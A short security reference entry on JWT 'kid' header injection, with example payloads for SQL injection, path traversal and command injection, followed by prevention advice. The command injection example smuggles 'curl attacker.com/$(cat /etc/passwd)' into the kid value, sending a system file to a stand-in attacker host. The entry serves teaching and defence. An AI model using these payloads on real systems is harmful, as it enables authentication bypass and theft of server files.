JWT Kid Injection

JWT Kid Injection exploits the "kid" (Key ID) header parameter when it's used unsafely to retrieve verification keys. If the kid value is used directly in SQL queries, file paths, or command execution, attackers can manipulate it for injection attacks.

How It Works

The kid header is intended to identify which key should be used for signature verification. If the server uses this value without sanitization, attackers can inject malicious values.

Attack Vectors

SQL Injection via kid

// Vulnerable query
SELECT key FROM keys WHERE kid = '[kid_value]'

// Attack payload
{"alg": "HS256", "kid": "1' UNION SELECT 'attackersecret' --"}

// Query becomes:
SELECT key FROM keys WHERE kid = '1' UNION SELECT 'attackersecret' --'

// Sign token with 'attackersecret'

Path Traversal via kid

// Server reads key file based on kid
key = file_read("/keys/" + kid)

// Attack payload
{"alg": "HS256", "kid": "../../../dev/null"}

// Sign with empty key (null bytes)
// Or use a file with known content like /proc/sys/kernel/randomize_va_space

Command Injection via kid

// Vulnerable: kid used in shell command
{"alg": "HS256", "kid": "key1; curl attacker.com/$(cat /etc/passwd)"}

Prevention

• Use parameterized queries for database lookups
• Validate kid against allowlist of known key IDs
• Sanitize kid to remove path traversal characters
• Never use kid in shell commands
• Store keys by index/ID, not by user-controlled name

PentesterLab Exercises

• JWT Exercises

See Also

• JSON Web Token (JWT)
• JWT Key Confusion Attack
• SQL Injection
• Path Traversal